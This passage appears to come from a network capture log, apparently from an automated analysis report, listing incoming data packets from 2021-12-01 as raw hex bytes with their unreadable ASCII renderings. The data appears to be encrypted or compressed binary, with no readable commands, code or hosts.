a8 07 e4 a5 15 30 90 05 d6 fc 22 78 f4 97 d9 4b 20 a6 58 b3 89 4e 0e de 60 f1 fb b3 ed 74 68 14 fe b5 9a 42 11 db 2e 6a 9b e7 46 54 be ca 0b 8f 07 54 f3 a5 Data Ascii: x;-e-Ll(wWn\R4"Vsn,0pFSa[ycQgs(!9qHnr*Pts'b6Znj%'lnB`#P5E3(3/]rjU2+6?m^gy)N>J;~o\h:%=v,m0"xK XN`thB.jFTT
2021-12-01 18:25:38 UTC	131	IN	Data Raw: 87 98 88 d0 05 cc cc e9 28 ab 24 4e 77 49 bb 5b 28 df 5e 6c 20 58 ce a9 9a c2 a5 2b b9 6d d2 4f 94 e1 19 d2 8c b6 96 68 a9 9e d0 97 2f 35 86 42 df 12 8d 6e 33 8e 15 dd 9b 51 6b c3 99 ac 92 3d f0 94 47 a9 b5 bd ff 37 63 33 02 8c ea f8 28 6e 8b 24 b7 98 60 96 91 c0 2c d3 f9 f0 21 58 02 fe 87 57 e3 31 21 b1 13 a0 25 80 61 4a 08 35 85 6e 38 74 0b 3f cd bf 04 b7 04 64 c9 46 1d 3c e3 59 14 93 87 a0 32 aa c0 97 18 5c a3 f8 25 80 db 10 ac 83 d4 bd e9 56 2f fd 75 e4 a6 b2 15 a2 f9 0b a0 81 97 47 94 7d 74 65 7d 3b db 87 95 db a8 3e aa 72 59 75 7b fd 02 37 d9 7d 70 64 ae b4 c1 c9 11 c4 ad ae 26 18 3c f1 54 92 78 1a 1a 98 a5 55 fe 19 0b 80 cf f2 db af 5f 9d 97 8d e1 18 cf ab e3 16 a2 28 9d 00 d6 0f a9 36 d8 1d 96 86 10 d6 96 1a 5b 63 f5 e3 bb af 71 1a 79 e0 e2 d2 58 Data Ascii: ($NwI[(^l X+mOh/5Bn3Qk=G7c3(n$`,!XW1!%aJ5n8t?dF<Y2\%V/uG}te};>rYu{7}pd&<TxU_(6[cqyX
2021-12-01 18:25:38 UTC	132	IN	Data Raw: 87 2f d3 ce 39 ed 25 6b a6 82 15 af d9 69 8f 65 ed 28 a9 a1 c3 de 48 2d e9 89 46 2a 87 12 6d 71 0b ba b5 3e e2 d2 d0 f7 f5 c0 2d 23 ec 50 11 04 6c 5e 39 24 04 aa 39 34 b6 aa a6 5a fe 9b a3 75 3c b6 02 a8 67 f1 b6 ef 3c b6 09 40 02 93 bf 80 7a 64 4c be f1 98 37 6d 24 9d f0 36 c7 3d 36 79 e3 3c 7f 1b 31 86 3d bb 87 56 b6 3a 24 1e 5e 21 58 8c 18 88 6d c1 de 74 f0 d2 7c 5e d3 01 d6 b3 37 6c a8 e3 bc 3f 6e d3 3d b2 ec 38 2d de 01 84 ad 9d ec 61 4a 1a b6 f4 f7 27 11 ac 1f 41 f6 8a b4 7a df bf 5d a1 06 41 d1 ab 11 3e 49 97 2a c3 7c 1d fb 35 44 d3 b0 0e 78 7e c8 3e 9b 8a c8 42 3e 8e cc e4 75 ba 1c 5b 03 02 80 35 ee 1c a3 3a 05 e2 a4 d3 6c 29 e1 4b 31 92 af 55 bf 9b c1 c5 61 1b a0 ad b6 39 3c e0 69 2a ac 50 de af 54 7c 3d 9c 8a d1 01 66 60 57 af bf a7 2c 53 3b c5 Data Ascii: /9%kie(H-Fmq>-#Pl^9$94Zu<g<@zdL7m$6=6y<1=V:$^!Xmt\|^7l?n=8-aJ'Az]A>I\|5Dx~>B>u[5:l)K1Ua9<i*PT\|=f`W,S;
2021-12-01 18:25:38 UTC	134	IN	Data Raw: 18 c6 ae 48 6a a4 9d 4c 14 5f 9a d0 33 bd 52 48 71 45 ce 41 67 26 38 61 ba d1 2f 38 0d 56 51 a0 ed 54 99 69 77 94 15 78 c3 b3 0a 60 5d da ce 55 0e f4 fa 7b 3f c5 9d 4b cb bd 64 de a4 8f da be 29 6d 94 1b 29 fe d6 3b 06 af 62 f3 14 cc 23 c7 2c 30 0c 13 10 ba 87 f8 c9 f7 6d cf 92 2b 07 12 30 51 45 9d f4 32 05 ae d6 9f a7 7c e9 fe 80 4b 1e 62 a2 31 64 0b 68 73 57 f7 27 ba 88 48 e1 cf 86 80 c6 0c ba db d4 88 22 9b cf b3 f6 f5 4b 9d b2 87 61 c4 ab 84 33 fb fe 40 85 f3 2c 3b 0a 90 ec e6 ff 03 0b 23 e0 8f 08 05 bc f4 2a ed 54 05 44 ae 2d 55 d7 91 03 93 71 40 f3 58 bc 51 5b c7 60 c6 91 c2 5a d0 b8 48 8d b9 5b 89 9a e7 1d 9c 54 97 6f 18 a0 69 cb 46 1c 81 f6 18 fd f8 a8 a0 ac 8b 2b 9a 30 77 e5 32 a6 d4 f0 b3 56 ec 07 63 7d 79 be eb 39 e8 47 c0 dd a9 5a 5a 8b 1a 6b Data Ascii: HjL_3RHqEAg&8a/8VQTiwx`]U{?Kd)m);b#,0m+0QE2\|Kb1dhsW'H"Ka3@,;#*TD-Uq@XQ[`ZH[ToiF+0w2Vc}y9GZZk
2021-12-01 18:25:38 UTC	135	IN	Data Raw: 81 33 6e 2d de f9 71 c2 21 01 4b f2 05 5e 0d 34 a4 3b ae f4 6c df 3f 38 29 6c 30 63 b2 08 8b 29 d3 c1 69 9d c8 71 1e d3 05 d6 f4 19 6c a4 eb a9 2e 4e a6 3d 9f ed 27 11 ab 14 a1 a7 bf f9 74 6e 10 92 e4 fb 26 74 a9 76 58 f2 89 bd 39 da e4 48 8f 07 5c c8 b1 09 1b 56 97 5a c3 7b 00 fc 25 51 fa b0 0f 0b 72 c6 3f f2 b2 d4 58 01 86 db af 60 cf 13 7d 18 1b a0 34 b3 02 ab 39 09 ad b0 d2 46 1f f7 5a 13 fd ae 49 b6 97 8e c7 7c 26 a8 b4 84 78 31 e0 7c 1c c9 53 e1 ae 55 64 34 d7 e7 d2 0a 76 6c 4d b5 8a ab 3f 46 3c c8 34 75 49 9b ef 49 bb ac d6 24 5a 2c 48 63 c9 60 4a c9 0a 63 1d 53 59 56 12 66 3c 54 9a 24 65 54 31 bd bb 87 69 a0 8c 55 02 cd 51 2d 38 5d 89 5b 5e 82 85 ac 73 10 a1 f0 9f c0 f0 c7 8d ee 8e 4d 50 6e 98 00 a3 44 d4 1d 64 14 18 f4 2c 84 0e 1d b9 74 00 72 5b Data Ascii: 3n-q!K^4;l?8)l0c)iql.N='tn&tvX9H\VZ{%Qr?X`}49FZI\|&x1\|SUd4vlM?F<4uII$Z,Hc`JcSYVf<T$eT1iUQ-8][^sMPnDd,tr[
2021-12-01 18:25:38 UTC	136	IN	Data Raw: 8c f4 fe e9 ec 5b cb 92 0a 75 16 2b 60 56 aa fe 15 0d c9 cf 97 a5 11 f3 f3 c0 4b 10 6f df 39 7d 1b 7b 69 4a c1 3c 99 87 5d ec cf 86 8e fb 3e ac c4 d4 88 22 9b cf e3 f3 f3 46 f0 a8 8a 21 c4 ab b4 7c e5 f6 70 bf f3 34 06 63 98 ed eb c0 30 00 36 81 8c 02 04 d5 c0 2c ed 57 0d 43 f4 40 4f d7 90 2f 9a 63 0f f0 52 bd 38 75 c5 67 c7 b5 d2 4d b5 bb 45 e9 a7 76 8e 84 e9 16 dc 57 9f 65 03 e1 6d c1 4d 1f 88 92 5b fd f8 a3 8a 84 8d 2b 9c 5f 6e e2 39 a8 cd 94 f0 52 e5 07 45 50 54 b5 fc 1e 9d 4c cb d1 b4 19 5f 87 15 72 71 56 17 13 a4 00 c9 6f 5e fe 5b b0 a9 d1 63 17 6b 5e 82 fb 79 2c b6 93 ae de 51 e4 28 e2 85 9d 3f 9c 6d 25 1b 79 aa 62 5f e5 79 2b 0b 2c e4 08 42 aa 45 9e 7f 2c 12 ed 34 81 bf d2 d2 a8 03 65 6c 1a 3e 41 f2 88 b9 66 4b 38 1e d8 f3 40 7b 3e 3e 1e 34 cf 96 Data Ascii: [u+`VKo9}{iJ<]>"F!\|p4c06,WC@O/cR8ugMEvWemM[+_n9REPTL_rqVo^[ck^y,Q(?m%yb_y+,BE,4el>AfK8@{>>4
2021-12-01 18:25:38 UTC	138	IN	Data Raw: 38 39 56 9d 58 f6 6c 1d c0 01 30 e9 bc 13 66 72 cb 75 ec 9c d7 49 1a 8d ef af 60 8a 16 66 19 04 99 35 e5 1b 83 5d 17 83 b3 c3 5d 14 c3 5a 13 b8 b1 52 bd 8c 95 d7 70 01 9a c0 a5 7e 33 f8 7c 1d e7 53 e9 b6 5d 40 3e be ef cf 2b 6d 51 57 b3 8d ab 33 64 04 a4 36 79 5a fe cb 4e 98 a0 ed 18 6a 7f 57 65 d5 79 6a de 43 14 0b 4c 52 72 11 45 77 4d ba 04 0c 6c 25 bf 8d a6 68 95 9d 6c 3f df 3c 04 34 4f 93 14 5c 9f be af 6e 06 ea f7 9f c4 f0 c6 86 c8 8f 5c 6c 1b 82 2d a8 5f ca 79 3d 18 07 f5 0c a5 3c 0c 98 4a 1f 73 57 fb 60 0b d5 9d a4 7f f7 84 b0 45 84 ae 20 86 2d 65 b5 3d 3f 5a 5d 54 b2 61 55 fb b0 6a 81 af 08 29 a4 8e 0e a5 a5 f4 29 c6 b7 60 25 94 80 46 d6 79 2a 59 0b ea 2d 4d cc 00 21 45 a8 8d c8 fd 0d 95 5c d8 d2 87 06 fa 40 59 b7 e2 a3 d0 01 c7 c7 8c f3 01 1d d6 Data Ascii: 89VXl0fruI`f5]]ZRp~3\|S]@>+mQW3d6yZNjWeyjCLRrEwMl%hl?<4O\n\l-_y=<JsW`E -e=?Z]TaUj))`%Fy*Y-M!E\@Y
2021-12-01 18:25:38 UTC	139	IN	Data Raw: fb c0 24 f5 5f 2f 52 ae 7e 47 ca a9 01 92 60 03 fb 31 af 59 6e cd 41 dd 80 f4 40 a0 a7 44 99 b1 6d 85 a1 e1 13 96 5f 80 0c 1b c9 70 cf 45 15 c2 e5 57 e6 f4 83 bc 9c b7 36 89 2d 7c fb 36 b7 c5 b8 bb 5e ec 0b 58 13 4f bb f9 1e d2 54 d2 ef a9 33 59 87 74 71 7d 7b 12 0b ae 45 be 79 41 f5 79 a8 b9 a8 7c 13 76 54 c1 89 34 08 c2 f6 ed b6 24 8a 43 e2 e8 f0 f6 b6 29 40 48 3a cf 0c 33 a0 0e 42 65 41 89 6c 6c c7 28 f7 f0 2d 77 9e 57 c4 d1 b6 d2 c5 6e 0c 03 5c 52 34 81 e0 b9 11 22 56 73 b5 97 6e 16 53 eb 34 72 a3 e3 93 13 cd 9e 35 10 ba ca 0c c9 5f f3 16 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 da e5 28 0f cd b4 6e 4d 2d 32 cd e6 48 b6 ce 6e c4 37 2a d6 f2 50 d7 b0 89 ca 12 84 46 c4 cc a7 76 5a 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 e0 a5 f6 e8 df 1a 12 ee 4c 33 Data Ascii: $_/R~G`1YnA@Dm_pEW6-\|6^XOT3Ytq}{EyAy\|vT4$C)@H:3BeAll(-wWn\R4"VsnS4r5_]y$+s(nM-2Hn7*PFvZb6ZjFL3
2021-12-01 18:25:38 UTC	140	IN	Data Raw: 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 59 14 e7 7c 88 5b 28 85 6a 6c 20 db 01 56 9a 68 2d 2b b9 a4 e2 4f 94 0f 69 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee 15 37 63 43 3e 93 50 69 1a da 82 57 a4 20 61 07 6e e1 78 41 a2 83 01 05 43 91 e0 41 b1 5c 01 41 41 ce 4b 5b 26 6a 6a b1 96 1c 4d 14 1f 56 a3 a0 74 f8 57 34 90 29 79 c8 f9 54 19 25 97 a0 Data Ascii: A, Q. mcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Y\|[(jl Vh-+Oih/jBn37$Z=u7cC>PiW anxACA\AAK[&jjMVtW4)yT%
2021-12-01 18:25:38 UTC	141	IN	Data Raw: 47 7d 17 46 ca 7b a1 19 37 90 b6 22 d8 ff 2e 7a 12 b4 01 fc 10 c0 8f 0a 05 e6 db 75 bc 69 18 1b 54 78 da 16 97 0f df 2c 3b f5 8b 82 11 5f 04 29 80 97 a5 b2 b8 38 24 cd 04 8e d0 e5 81 96 38 f3 16 40 72 34 91 b6 46 04 36 76 73 a5 c4 91 03 73 77 71 62 6f e3 93 13 cd 30 70 10 ba ca 0c c9 5f 3f 53 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 82 a0 28 0f cd b4 6e 4d 55 77 cd e6 48 b6 ce 6e a2 72 2a d6 f2 50 d7 b0 1d 8f 12 84 46 c4 cc a7 f0 1f 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 42 9c 23 50 04 1b 37 57 49 69 ce 17 55 c3 d2 e1 3f 8a df c6 03 7f d7 72 db 26 f1 d7 9a 44 f1 6c 34 46 f6 c9 c3 1b 14 3f e9 f1 ef 5e 03 49 f0 94 18 a6 48 4e 3e 86 48 3b 7e 47 c5 5c cb f4 01 b6 5b 51 66 19 44 2c c2 6d e5 29 a4 a8 07 f0 a5 15 30 be 6c b2 9d 56 19 d0 a4 Data Ascii: G}F{7".zuiTx,;_)8$8@r4F6vsswqbo0p_?S]y$+s(nMUwHnr*PFb6ZjFnB#P7WIiU?r&Dl4F?^IHN>H;~G\[QfD,m)0lV
2021-12-01 18:25:38 UTC	143	IN	Data Raw: 8f 27 26 bb 9d 84 54 99 e9 a7 63 aa d9 e1 b2 48 2c 15 38 5a 2e f0 79 c1 08 0d d1 df 04 d6 9b 69 5f d3 ef 60 e8 f1 af 5a a7 84 2d 25 e3 90 00 bb 14 e8 5f 7c 8b 82 00 85 6e 9a 08 db fe a6 b3 68 95 01 90 a4 e2 08 bd 0f 29 b6 a5 a3 a7 e7 80 aa e1 3b 06 6a b7 93 f6 98 bc 98 1a 37 24 c4 b1 b9 5a f9 b3 ab a0 60 da a4 75 d7 9f ee cd 90 49 43 30 40 c0 67 1a 9f a1 9a 85 8c 4b 4b a3 ef 07 29 cb be 0a 75 31 8b ac 33 d0 91 0a 22 20 63 0e 34 52 a0 23 d4 b6 7f 14 7a 3f 09 e1 80 30 e4 28 14 fd ce 31 ad d7 ea 38 2f b3 7a 1e 4f f4 8c 35 56 96 a4 08 af ee 93 81 cd e1 11 c4 29 1a 24 58 44 93 b4 3b 6b cc 26 8e 71 a2 25 ba 58 42 ec 53 77 ed 37 bb aa 9e eb 84 e6 6f 8f 55 46 34 14 f6 95 46 2e 81 a1 f6 a0 3e 84 9a 20 09 7d 0b 44 7b 10 4f ce 35 21 92 aa d1 e9 3c aa ff eb e3 f6 6f Data Ascii: '&TcH,8Z.yi_`Z-%_\|nh);j7$Z`uIC0@gKK)u13" c4R#z?0(18/zO5V)$XD;k&q%XBSw7oUF4F.> }D{O5!<o
2021-12-01 18:25:38 UTC	144	IN	Data Raw: d4 76 b9 74 02 79 cc af 7e 84 30 5b 26 d3 f8 15 18 d6 40 a5 60 2b d1 87 16 a9 86 f0 c9 5e 6a bf b4 19 24 3b 1a a0 82 66 f9 be 0b cc 36 58 bf 84 35 a5 b0 52 fd 76 ed 28 a5 a0 95 f0 68 0b d0 a5 5b 3e ec 25 76 61 62 b5 a1 2a 97 b7 f4 df f1 cf 3d 2d e9 4d 34 04 6c 5e 39 24 04 aa 39 05 af b3 98 6c e5 aa a8 67 7f 87 1e ba 5f a2 b8 ef 2a 95 2d 34 31 9f a7 ae 76 70 11 b9 9d 8e 27 50 26 85 fa 7c e7 48 1e 52 e7 31 68 11 32 ab 38 9c f4 76 df 35 3c 0b 7d 6a 7c ae 0c 9c 7a cb dd 69 94 f2 15 63 db 02 d6 d9 24 70 a6 c1 ab 06 45 d5 23 97 ee 2b 5e a9 09 9f b8 b7 ed 3b 4f 10 b4 e5 de 30 78 ad 13 5d d6 82 a3 27 df ad 40 e6 34 7a d0 85 0d 3b 61 8a 43 d6 09 12 dd 2e 5d f3 b1 53 5c 50 f8 1a eb 8d e4 54 3a 97 a8 ab 61 b7 23 71 02 32 a8 26 de 0e b2 2e 21 e2 b2 cf 7a 17 e9 5b 49 Data Ascii: vty~0[&@`+^j$;f6X5Rv(h[>%vab=-M4l^9$9lg_-41vp'P&\|HR1h28v5<}j\|zic$pE#+^;O0x]'@4z;aC.]S\PT:a#q2&.!z[I
2021-12-01 18:25:38 UTC	145	IN	Data Raw: 2b 98 fd c8 2b 41 45 4b af c8 cd 28 aa f7 cc f7 3d 87 cd 1b c4 d8 8a e3 5a 00 2a 77 e9 9e 22 68 1c e4 e8 d6 ec 12 22 cd a7 7b 29 a6 93 48 32 54 8a de 5a b5 5d 45 72 52 cf 46 34 25 23 66 b9 db 0a 16 17 5c 56 8a e5 44 ee 6d 71 91 22 4d df b8 3a 14 42 d0 c9 7e 20 95 f3 5b 39 fb 95 44 c1 8a 42 c9 be 8e c8 9b 4a 7f fd 02 2d fd df 78 0f e2 66 c3 18 ee 28 f5 3c 01 0a 10 1a 8c e9 f1 f8 fb 4d c5 93 1d 16 1e 46 59 54 b0 c6 23 0a ca e2 99 a4 7c e5 f4 ca 67 7d 7c 98 3a 7d 22 7e 34 4c f1 3c ad 8c 52 e4 8c 84 8e c2 3e b1 cb cc e1 2a 94 c2 b0 e1 f4 4c de aa 83 62 c8 a8 84 4a 96 ea 40 b8 fb 35 06 4d 98 e3 eb fc 14 0a 24 a3 8d 0c 0c b4 d9 21 d4 3a 0d 44 b3 7e 47 d0 9b 3d 8a 67 07 f0 56 99 38 6f c1 60 c5 99 c5 00 bd b6 48 ba b5 71 84 ba f0 00 9b 54 95 4d 6c cd 7d cb 7b 14 Data Ascii: ++AEK(=Zw"h"{)H2TZ]ErRF4%#f\VDmq"M:B~ [9DBJ-xf(<MFYT#\|g}\|:}"~4L<R>LbJ@5M$!:D~G=gV8o`HqTMl}{
2021-12-01 18:25:38 UTC	146	IN	Data Raw: 03 82 0d e3 44 d0 1d 23 30 1f d7 20 bf 35 1c 81 5e 15 76 4d 8f 64 0d df f4 9a 78 d4 8c ae 52 cb be 24 f0 3f 45 b5 17 37 4a 23 56 a8 6c 48 db b1 49 e4 ab 1a 3e a6 a2 60 85 a9 e3 33 ee be 4a 55 86 87 28 cc 7d 20 1a 11 ef 75 45 ec 0a 05 69 b5 b1 d9 ff 06 95 46 d0 c0 8b 06 fa 5f 5b b7 fc c2 d5 0d e1 cf 80 f3 4a 18 b7 35 b6 f6 d1 03 57 19 49 b4 ff d0 13 ad c9 d9 c5 4d 91 d6 10 e1 d0 8f a9 52 11 43 5d e5 8e 0e 53 00 d9 ff f6 fd 14 4b d4 a9 42 44 a6 94 0f 18 58 9a ee 7a be 63 44 51 45 d4 25 59 3b 2e 61 9d d8 3d 4c 1b 4d 4b cd f7 59 d9 69 79 99 68 70 c4 b3 30 5d 41 e0 d4 53 3d 80 97 75 3f f2 91 6c c1 bd 64 c3 bd e1 ca 80 47 77 90 11 6a fe db 71 02 85 65 f3 05 cd 37 94 35 2b 01 14 3e 83 d2 fb da ec 5b da 87 1d 10 33 23 55 53 bc e7 46 13 c7 cf 9b a4 75 aa f7 c7 42 Data Ascii: D#0 5^vMdxR$?E7J#VlHI>`3JU(} uEiF_[J5WIMRC]SKBDXzcDQE%Y;.a=LMKYiyhp0]AS=u?ldGwjqe75+>[3#USFuB
2021-12-01 18:25:38 UTC	147	IN	Data Raw: 28 20 51 e0 8d eb 74 51 22 12 c7 e3 6e 7b 3a 33 18 21 d7 91 f6 72 a0 63 04 7f ca ca 7b a0 31 52 3e db b3 30 10 dc 4d 9a 71 59 fb 96 1e 94 b6 ed d0 28 62 a4 cc 0b 3f 16 1b a2 95 2d b6 b9 07 cc 1f 47 b2 dc 3d be c8 78 fd 51 e8 29 b7 a9 a7 9d 76 1a db ba 71 3f b6 29 6b 6b 7f a9 af 2a e1 d2 d0 d2 f9 da 1d 03 9c 54 39 6a 76 5a 33 67 04 a7 6f 30 b1 95 84 4b c9 b0 a8 77 0d b8 1e 9f 43 85 b6 f3 28 82 2d 34 2b 9f b1 a6 69 53 5a 9d b2 80 30 77 3b 9f f8 5c c3 3c 2f 57 ea 3b 6c 7e 30 ac 32 a6 99 65 98 36 38 1e 7c 36 6b a7 19 a6 46 ca dc 75 9f c9 51 55 ca 0d db f1 25 4e d0 c9 b0 33 45 d4 17 93 fd 0a 3b a8 23 90 a5 a9 c8 15 6b 1c b4 ec f7 26 3f b6 1f 57 fe 95 97 31 ca 8e 40 90 20 54 f7 b7 3c 4b 49 9b 52 c7 7b 22 d1 34 74 fb a3 3e 6a 6f dc 0c 9b 8a c8 42 3e 8e cc e4 79 Data Ascii: ( QtQ"n{:3!rc{1R>0MqY(b?-G=xQ)vq?)kk*T9jvZ3go0KwC(-4+iSZ0w;\</W;l~02e68\|6kFuQU%N3E;#k&?W1@ T<KIR{"4t>joB>y
2021-12-01 18:25:38 UTC	148	IN	Data Raw: 46 d4 cd 8d 1c f1 6a 42 d2 e1 ce ce 07 fa cf 8f f3 62 0f c4 31 be ff d9 6e 44 5e 4a b0 f6 dd 74 ae f4 c2 cf 6e 95 ca 11 e4 d0 9d be 56 04 26 30 e1 87 0e 75 3d ee ee c7 ed 06 2d c6 b2 2c 5e a2 9e 4c 18 55 d0 ea 5e b9 5e 72 47 54 e2 50 52 34 2f 7a d4 db 03 51 15 6c 5a b9 c9 5e d1 6b 14 8a 2f 73 c0 ba 3d 3a 42 de c9 5d 1c 91 e3 51 38 f0 97 25 c2 83 79 c3 9e 95 cf 80 47 7d a9 1a 02 dc e7 47 28 8f 4a a0 06 cb 29 f9 35 26 4b 10 1a 84 e8 c6 de ec 57 c4 81 3b 1a 3d 09 61 65 9a d6 07 64 c3 cc 9f a6 42 f0 e8 c7 48 1a 5f 9e 12 5f 1a 48 59 62 c5 55 89 80 52 ed a2 8f cd c2 32 b6 c0 de 95 35 9e c5 84 d0 f5 6e d2 90 bc 4c ea 91 e0 70 fb f4 46 81 e4 31 16 06 f5 f7 eb c1 1c 09 24 ce 8f 0c 08 ba e0 37 ea 4e 05 27 b7 40 51 c7 8c 1a 9b 78 29 fb 45 8e 5d 6a db 67 c7 9a a1 59 Data Ascii: FjBb1nD^JtnV&0u=-,^LU^^rGTPR4/zQlZ^k/s=:B]Q8%yG}G(J)5&KW;=aedBH__HYbUR25nLpF1$7N'@Qx)E]jgY
2021-12-01 18:25:38 UTC	150	IN	Data Raw: 2e 86 0f 72 46 6a ab b3 07 a5 c0 cd dd fd db 0a 6c eb 42 26 61 54 42 23 0e 0c ba 53 30 b5 91 80 4f f9 9e c6 74 1e a1 17 94 53 85 90 ff 30 b5 09 42 05 97 b9 b0 4c 14 48 80 9f 82 33 67 67 87 f5 6e c3 07 3b 4a c1 2d 4f 3a 22 b3 1f aa 84 72 e1 5b 26 07 6f 21 63 b7 19 a2 4c d0 ed 75 82 ca 67 64 db 14 c6 dc 56 6e b9 ca b4 26 44 88 27 97 ff 2b 11 ab 14 b6 b0 ae cc 67 6e 1a a8 d5 ff 3a 65 9a 76 58 fa 91 b5 1b cb be 62 83 17 70 f5 b6 12 39 70 97 52 d6 5e 65 c3 29 5e f3 b8 19 25 68 ce 2d fe b2 d4 58 14 86 dc 8f 66 bd 0b 66 22 13 b5 24 ca 6f b5 3c 16 87 8a d3 60 3d e1 4b 2e b9 c3 57 bb 90 ac df 6c 5b ba a1 a4 72 12 e0 65 3e ac 50 c1 84 38 7e 31 8f ef f4 1b 6b 64 5d b5 97 bb 26 54 36 d2 32 18 5b f2 ec 4d b2 a1 b7 26 4f 09 45 43 ce 60 40 df 19 2d 1f 57 73 5e 09 71 12 Data Ascii: .rFjlB&aTB#S0OtS0BLH3ggn;J-O:"r[&o!cLugdVn&D'+gn:evXbp9pR^e)^%h-Xff"$o<`=K.Wl[re>P8~1kd]&T62[M&OEC`@-Ws^q
2021-12-01 18:25:38 UTC	151	IN	Data Raw: 38 7a 3f 3f cd 80 30 b7 04 14 fd 46 1d ad d7 59 14 2f b3 a0 32 4f f4 97 18 56 96 f8 25 af ee 10 ac cd e1 bd e9 29 1a fd 75 44 93 b2 15 6b cc 0b a0 71 a2 47 94 58 42 65 7d 77 ed 87 95 aa 9e 3e aa e6 6f 75 7b 46 34 37 d9 95 46 64 ae a1 f6 c9 11 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f df af 8d e1 47 f7 ab e3 84 9a 28 9d c5 ee 0f a9 c6 e0 1d 96 9d 29 d6 96 58 62 63 f5 80 82 af 71 64 40 e0 e2 61 61 d5 b7 45 83 3a 60 27 da 2d 22 be ff 6e fe 15 6e 9e 31 d8 38 18 a8 0e a8 f4 a1 2e d0 d5 21 e9 d0 1f e0 e9 84 72 f2 3a f2 0c 6c a0 1e a2 28 71 ec 92 36 90 91 cc c9 e8 e2 58 f9 5f 19 8b 57 c5 a0 f0 de 3f 88 6e 2a 13 38 da 8f 7b 9d 21 a6 b8 db 5a 2d e2 74 06 14 15 6f 66 ca 4f c9 18 37 8a 06 f9 fd cc 3e 3f 32 7c f1 d1 2c 2d f2 63 dd 16 14 Data Ascii: 8z??0FY/2OV%)uDkqGXBe}w>ou{F47Fd&}TO!U<_G()Xbcqd@aaE:`'-"nn18.!r:l(q6X_W?n*8{!Z-tofO7>?2\|,-c
2021-12-01 18:25:38 UTC	152	IN	Data Raw: 44 c2 6d e5 a9 f7 21 42 58 5a c2 5a be e5 f7 71 06 e6 06 2f 84 43 ab 5e d9 8b 39 24 5a b6 60 c1 d5 da de 7f 1c 8a 09 0a 6a c7 e7 af 98 45 9b 6a 95 fc ee 9d ae 9b 8f 63 d0 3b 28 f7 73 0d 7f 52 89 5b f9 cb 6d 26 a1 71 61 1f 22 1e 63 ad f1 46 53 1c fd 0a d2 8a 6f 14 1e 96 e3 50 9d 90 97 f9 53 22 48 db 9c d1 ee 7b 0d fd 68 8b 79 73 44 f6 f7 8a 32 90 3a 43 a0 6a ee fa 0d 28 77 b5 98 63 50 91 75 44 71 1f dc 6d 5d 50 8b f7 95 93 d1 0e 95 69 13 d2 ad 5a 81 66 ae d1 2f 13 cc eb 44 57 ea 3d 33 3a 69 c8 6e 8b 87 d2 36 76 ef 0c 1b 44 99 b8 85 04 82 a8 70 71 aa 51 00 02 b0 a5 ac d4 a3 64 49 fb 08 c4 03 01 4d e1 8a 65 ca 52 c3 7c e3 aa 95 9d 79 d3 79 b5 2c b1 79 c1 cb 7b 69 6f 7f 9c 00 b3 c2 e5 35 eb 62 86 8e 18 94 31 22 ab d9 41 84 27 a1 9e f2 0a a3 88 7f 3e f7 de c2 Data Ascii: Dm!BXZZq/C^9$Z`jEjc;(sR[m&qa"cFSoPS"H{hysD2:Cj(wcPuDqm]PiZf/DW=3:in6vDpqQdIMeR\|yy,y{io5b1"A'>
2021-12-01 18:25:38 UTC	154	IN	Data Raw: 46 28 ca 10 2b 11 21 72 1a e6 6e 85 d2 bb bb 41 d0 79 94 fe e4 02 b6 55 7c 0e 90 e8 b8 d5 14 fe f9 6b 33 25 fa 35 21 71 a1 18 eb a9 65 32 5e 5d bd 38 92 b0 59 8d dd 36 5c 8f e8 42 78 86 04 6c 19 c2 13 3d 80 d4 50 cc 2b d9 a0 e3 e6 1f 27 86 31 9d cb 9f 11 6c ea e2 d6 01 20 3a d6 84 32 f2 3a ae 0c 6c a0 00 92 0d 41 c0 a2 03 a0 17 fc 65 d8 e1 69 ec 6e 3b ba 9c f4 bb c2 0c 0d 95 5d 2b 27 1f ee 70 4f b1 14 4b 8d c1 6c db d4 48 31 79 2d e5 5e 04 53 1d 20 df a8 cd e5 95 c6 51 43 51 0b 49 b3 f5 77 91 cd 22 8d c5 b1 03 de 87 cc ce cf 9e 7c a8 26 7e 32 d3 da 0e 12 65 41 25 6c 6c c7 23 c7 46 59 00 af c3 d5 60 87 1c f4 69 3e 3f 6e 04 06 f2 d2 05 23 fb 64 85 87 84 5d 39 60 3d 42 f5 90 47 a0 da fe 2b 44 32 8e 82 38 86 6b 56 67 39 a9 93 4d 53 10 c1 30 0e ab 8f 46 56 f7 Data Ascii: F(+!rnAyU\|k3%5!qe2^]8Y6\Bxl=P+'1l :2:lAein;]+'pOKlH1y-^S QCQIw"\|&~2eA%ll#FY`i>?n#d]9`=BG+D28kVg9MS0FV
